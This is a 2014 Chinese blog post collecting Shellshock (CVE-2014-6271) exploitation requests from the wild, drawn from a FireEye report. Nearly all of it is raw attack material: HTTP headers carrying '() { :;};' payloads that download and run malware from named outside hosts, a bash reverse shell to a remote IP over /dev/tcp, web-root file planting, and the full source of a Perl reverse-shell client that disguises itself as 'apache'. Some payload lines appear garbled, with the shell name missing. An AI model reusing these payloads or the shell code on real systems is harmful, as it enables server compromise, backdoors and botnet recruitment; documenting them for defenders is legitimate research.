知彼知己,百战不殆

导航

破壳漏洞利用payload—shellshock in the wild

FireEye关于破壳漏洞(shellshock)在现实中的利用有一篇文章: shellshock in the wild

原文较长,进行了对CGI利用的详细分析,笔者比较感兴趣的是Shellshock in the wild, 包括反弹shell、植入后门、信息窃取等行为如何实现。笔者从原文中摘出了对应利用方式的HTTP报文,感兴趣的朋友可以看原文获取较详细的分析,也可以自己试着分析一下。笔者从Bash漏洞曝光以来,对其进行了数日的跟踪,对CVE-2014-6271破壳漏洞的跟踪

 

Reverse Shell Perl Script:
GET /cgi-sys/defaultwebpage.cgi HTTP/1.1
User-Agent: () { :;}; /bin/ -c “/usr/bin/wget http://singlesaints[.]com/firefile/temp?h=<domain> -O /tmp/a.pl”
Host: <domain>
Accept: */*


Tsunami/Kaiten, an IRC-based DDoS Client/Backdoor:
GET /cgi-sys/defaultwebpage.cgi HTTP/1.0
User-Agent: shellshock-scan (http://blog.erratasec.com/2014/09/-shellshock-scan-of-internet.html)
Accept: */*
Cookie: () { :; }; wget -O /tmp/besh http://104.192.103.6/bosh; chmod 777 /tmp/besh; /tmp/besh;
Host: () { :; }; wget -O /tmp/besh http://104.192.103.6/bosh; chmod 777 /tmp/besh; /tmp/besh;
Referer: () { :; }; wget -O /tmp/besh http://104.192.103.6/bosh; chmod 777 /tmp/besh; /tmp/besh;


UDP Flood:
‪GET / HTTP/1.0
User-Agent: masscan/1.0 (https://github.com/robertdavidgraham/masscan)
Accept: */*
Cookie: () { :; }; wget 37.187.225.119/conf.txt > /var/www/conf.php; wget 37.187.225.119/conf.txt > /var/www/html/conf.php
Host: () { :; }; wget 37.187.225.119/conf.txt > /var/www/conf.php; wget 37.187.225.119/conf.txt > /var/www/html/conf.php Referer: () { :; }; wget 37.187.225.119/conf.txt > /var/ ‪www/conf.php; wget 37.187.225.119/conf.txt > /var/www/html/conf.php

 

 

Perl.Shellbot, another IRC-based DDoS Client/Backdoor:
GET / HTTP/1.0
Accept: */*
Accept-Language: en-US
User-Agent: () { :;}; /bin/ -c ‘ -i >& /dev/tcp/195.225.34.101/3333 0>&1′
Host: <domain>
Connection: Close

 

 

Another Perl.Shellbot Variant:
GET /cgi-bin/hello HTTP/1.0
User-Agent: () { :;}; /bin/ -c “cd /tmp; wget http://dl.directxex[.]net/dl/nice.png; chmod +x *; perl nice.png” Host: <domain>

 

Tiny Reverse Shell ELF Executable:
GET /cgi-bin/ICuGI/EST/blast_detail.cgi%3FID%3DPU056535%26db%3DGenBank%26organism%3Dcucurbita_pepo HTTP/1.1
Host: <domain>
content-length: 0
accept-encoding: gzip, deflate
referrer: () { :; }; /bin/ -c “rm /tmp/.osock; if $(/bin/uname -m | /bin/grep 64) ; then /usr/bin/wget 82.118.242.223:9199/v64 -O /tmp/.osock; /usr/bin/lwp-download http://82.118.242[.]223:9199/v64 /tmp/.osock; /usr/bin/curl http://82.118.242.223:9199/v64 -o /tmp/.osock; else /usr/bin/wget 82.118.242.223:9199/v -O /tmp/.osock; /usr/bin/lwp-download http://82.118.242[.]223:9199/v /tmp/.osock; /usr/bin/curl http://82.118.242[.]223:91 99/v -o /tmp/.osock; fi; /bin/chmod 777 /tmp/.osock; /tmp/.osock”
accept: */*
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safari/537.36
cookie: () { :; }; /bin/ -c “rm /tmp/.osock; if $(/bin/uname -m | /bin/grep 64) ; then /usr/bin/wget 82.118.242.223:9199/v64 -O /tmp/.osock; /usr/bin/lwp-download http://82.118.242[.]223:919

 

   对于前文提到的第一个Perl的反弹脚本,其源码地址为:http://ww7.microtek.com.tw/Uploads/test/ttyClient.pl

#!/usr/bin/perl -w

use IO::Socket;
use Fcntl;

# IOCTLs
$TIOCGPTN = -2147199952;
$TIOCSPTLCK = 1074025521;
$EAGAIN=11;

print "pmsh.pl v0.1 (c) 2006 Michael Schierl <schierlm-public AT gmx DOT de>\n";

$HOST=$ARGV[0];
$PORT=$ARGV[1];
$0="apache";
print "Connecting to $HOST:$PORT... ";

$sock = new IO::Socket::INET (
    PeerAddr => $HOST,
    PeerPort => $PORT,
    Proto => 'tcp',
    Blocking => 0,
) or die $!;

print "ok\nAllocatig pseudo terminal... ";

## ptsname
sysopen (PTMX, '/dev/ptmx', O_RDWR|O_NONBLOCK) or die $!;
$tmp='';
ioctl (PTMX, $TIOCGPTN, $tmp) or die $!;
$pts = unpack('i', $tmp);

print "/dev/pts/$pts\nInitializing pseudo terminal... ";

## grantpt not needed on devpts

## unlockpt
$unlock=pack('i', 0);
ioctl(PTMX, $TIOCSPTLCK, $unlock) or die $!;

## prepare daemonizing
chdir '/' or die $!;
open STDIN, '/dev/null' or die $!;
umask 0;

print "ok\nForking shell thread...";

defined($pid = fork) or die $!;
exit if $pid;
defined($pid = fork) or die $!;
if (!$pid) {
    exec("/sbin/getty -n -l /bin/bash 38400 /dev/pts/$pts") or
    exec("/bin/bash </dev/pts/$pts >/dev/pts/$pts 2>/dev/pts/$pts") or
    die $!;
    exit;
}        

print "ok\nHave fun!\n";

open STDOUT, '>>/dev/null' or die $!;
open STDERR, '>>/dev/null' or die $!;

$pp = PTMX;
$rin=$win=$ein='';
vec($rin,fileno($pp),1) =1;
vec($rin,fileno($sock),1) = 1;

select $sock;
$|=1;
select PTMX;
$|=1;
select STDOUT;
$|=1;
$finished=0;

sub forwarddata {
    my ($from,$to) = @_;
    while(1) {
        $rv = sysread($from, $buff, 1024);
        last if (!defined($rv) && $! == $EAGAIN);    
        defined($rv) or die $!;
        if ($rv == 0) { $finished = 1; last;}
        while(length $buff > 0) {
            $rv = syswrite($to, $buff, length $buff);
            if (!defined($rv) && $! == $EAGAIN) {
                ## try again
                next;
            }
            defined($rv) or die $!;
            last if ($rv == length $buff);
            substr($buff,0,$rv) = '';
        }
    }
}

while(! $finished) {
    $nfound = select($rout=$rin, $wout=$win, $eout=$ein, undef);
    die $! if ($nfound == -1);
    forwarddata($pp,$sock);
    last if $finished;
    forwarddata($sock,$pp);
    last if $finished;
}
close PTMX;
close $sock;
$wout=$eout.$wout.$rout;

 

 

 

 

posted on 2014-09-29 15:56  r00tgrok  阅读(1942)  评论(0编辑  收藏  举报